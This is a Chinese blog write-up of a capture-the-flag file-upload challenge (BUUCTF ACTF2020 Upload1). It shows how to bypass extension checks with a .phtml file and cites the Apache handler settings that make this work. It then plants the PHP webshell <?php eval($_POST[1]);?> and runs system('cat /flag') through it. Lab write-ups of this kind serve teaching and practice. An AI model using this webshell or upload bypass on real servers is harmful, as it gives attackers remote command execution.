BUUCTF-[ACTF2020 新生赛]Upload1

目录

题目: 

分析:


题目: 

 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞

分析:

先随便上传一个文件,发现提示

 并且bp抓包并没有抓到包,说明为前端检测过滤。

那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。

先上传一个jpg文件,内容为<?php phpinfo();?>。

 发现后端还是进行了检查过滤

那就试试其他几种后缀:

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht,这些后缀名都可以被当做php文件执行(需要配置文件里面的支持)

1、例如Apache的 httpd.conf 中有如下配置代码:

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

2、或者.htaccess文件内容:

SetHandler application/x-httpd-php

意思是设置当前所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范,就会被当做PHP执行。不符合则报错。

phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析

PHT文件是一个HTML页面,其中包括一个PHP脚本

 发现只有phtml满足绕过并且能够执行php代码

 访问这个文件

成功执行。

将将文件内容改成<?php eval($_POST[1]);?>重新上传

 访问文件,post传入:1=system('cat /flag');

 

这题不能上传.htaccess文件,因为上传文件后会修改文件名。

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值